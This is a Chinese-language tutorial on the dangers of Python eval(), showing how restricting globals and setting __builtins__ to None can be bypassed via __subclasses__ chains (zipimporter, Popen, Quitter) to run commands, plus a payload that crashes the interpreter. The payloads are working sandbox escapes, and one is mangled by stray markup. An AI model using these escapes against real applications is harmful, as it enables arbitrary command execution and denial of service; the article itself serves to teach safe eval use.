您好,登錄后才能下訂單哦!
eval前言
In [1]: eval("2+3") Out[1]: 5 In [2]: eval('[x for x in range(9)]') Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]
當內存中的內置模塊含有os的話,eval同樣可以做到命令執行:
In [3]: import os In [4]: eval("os.system('whoami')") hy-201707271917\administrator Out[4]: 0
當然,eval只能執行Python的表達式類型的代碼,不能直接用它進行import操作,但exec可以。如果非要使用eval進行import,則使用__import__:
In [8]: eval("__import__('os').system('whoami')") hy-201707271917\administrator Out[8]: 0
在實際的代碼中,往往有使用客戶端數據帶入eval中執行的需求。比如動態模塊的引入,舉個栗子,一個在線爬蟲平臺上爬蟲可能有多個并且位于不同的模塊中,服務器端但往往只需要調用用戶在客戶端選擇的爬蟲類型,并通過后端的exec或者eval進行動態調用,后端編碼實現非常方便。但如果對用戶的請求處理不恰當,就會造成嚴重的安全漏洞。
”安全”使用eval
現在提倡最多的就是使用eval的后兩個參數來設置函數的白名單:
Eval函數的聲明為eval(expression[, globals[, locals]])
其中,第二三個參數分別指定能夠在eval中使用的函數等,如果不指定,默認為globals()和locals()函數中 包含的模塊和函數。
>>> import os >>> 'os' in globals() True >>> eval('os.system('whoami')') win-20140812chjadministrator 0 >>> eval('os.system('whoami')',{},{}) Traceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name 'os' is not defined
如果指定只允許調用abs函數,可以使用下面的寫法:
>>> eval('abs(-20)',{'abs':abs},{'abs':abs}) 20 >>> eval('os.system('whoami')',{'abs':abs},{'abs':abs}) Traceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name 'os' is not defined >>> eval('os.system('whoami')') win-20140812chjadministrator 0
使用這種方法來防護,確實可以起到一定的作用,但是,這種處理方法可能會被繞過,從而造成其他問題!
繞過執行代碼1
被繞過的情景如下,小明知道了eval會帶來一定的安全風險,所以使用如下的手段去防止eval執行任意代碼:
env = {} env["locals"] = None env["globals"] = None env["__name__"] = None env["__file__"] = None env["__builtins__"] = None eval(users_str, env)
Python中的__builtins__是內置模塊,用來設置內置函數的模塊。比如熟悉的abs,open等內置函數,都是在該模塊中以字典的方式存儲的,下面兩種寫法是等價的:
>>> __builtins__.abs(-20) 20 >>> abs(-20) 20
我們也可以自定義內置函數,并像使用Python中的內置函數一樣使用它們:
>>> def hello(): ... print 'shabi' >>> __builtin__.__dict__['say_hello'] = hello >>> say_hello() shabi
小明將eval函數的作用域中的內置模塊設置為None,好像看起來很徹底了,但依然可以被繞過。__builtins__是__builtin__的一個引用,在__main__模塊下,兩者是等價的:
>>> id(__builtins__) 3549136 >>> id(__builtin__) 3549136
根據烏云drops提到的方法,使用如下代碼即可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
上面的代碼首先利用__class__和__subclasses__動態加載了object對象,這是因為eval中無法直接使用object。然后使用object的子類的zipimporter對egg壓縮文件中的configobj模塊進行導入,并調用其內置模塊中的os模塊從而實現命令執行,當然,前提是要有configobj的egg文件。 configobj模塊很有意思,居然內置了os模塊:
>>> "os" in configobj.__dict__ True >>> import urllib >>> "os" in urllib.__dict__ True >>> import urllib2 >>> "os" in urllib2.__dict__ True >>> configobj.os.system("whoami") win-20140812chjadministrator 0
和configobj類似的模塊如urllib,urllib2,setuptools等都有os的內置,理論上使用哪個都行。 如果無法下載egg壓縮文件,可以下載帶有setup.py的文件夾,加入:
from setuptools import setup, find_packages
然后執行:
python setup.py bdist_egg
就可以在dist文件夾中找到對應的egg文件。 繞過demo如下:
>>> env = {} >>> env["locals"] = None >>> env["globals"] = None >>> env["__name__"] = None >>> env["__file__"] = None >>> env["__builtins__"] = None >>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')" >>> eval(users_str, env) win-20140812chjadministrator 0 >>> eval(users_str, {}, {}) win-20140812chjadministrator 0
拒絕服務攻擊1
object的子類中有很多有趣的東西,執行以下代碼查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
這里我就不輸出結果了,如果你執行的話,可以看到很多有趣的模塊,比如file,zipimporter,Quitter等。經過測試,file的構造函數是被解釋器沙箱隔離的。 簡單的,或者直接使object暴露出的子類Quitter進行退出:
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Quitter'][0](0)()", {'__builtins__':None})
C:/>
如果運氣好,遇到對方程序中導入了os等敏感模塊,那么Popen就可以用,并且繞過__builins__為空的限制,例子如下:
>>> import subprocess >>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None}) >>> 正在 Ping 127.0.0.1 具有 32 字節的數據:
來自 127.0.0.1 的回復: 字節=32 時間>>
事實上,這種情況非常多,比如導入os模塊,一般用來處理路徑問題。所以說,遇到這種情況,完全可以列舉大量的功能函數,來探測目標object的子類中是否含有一些危險的函數可以直接使用。
拒絕服務攻擊2
同樣,我們甚至可以繞過__builtins__為None,造成一次拒絕服務攻擊,Payload(來自老外blog)如下:
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})
運行上面的代碼,Python直接crash掉了,造成拒絕服務攻擊。 原理是通過嵌套的lambda來構造一片代碼段,即code對象。為這個code對象分配空的棧,并給出相應的代碼字符串,這里是KABOOM,在空棧上執行代碼,會出現crash。構造完成后,調用fc函數即可觸發,其思路不可謂不淫蕩。
總結
從上面的內容我們可以看出,單單將內置模塊置為空,是不夠的,最好的機制是構造白名單,如果覺得比較麻煩,可以使用ast.literal_eval代替不安全的eval。
以上就是本文的全部內容,希望對大家的學習有所幫助,也希望大家多多支持億速云。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。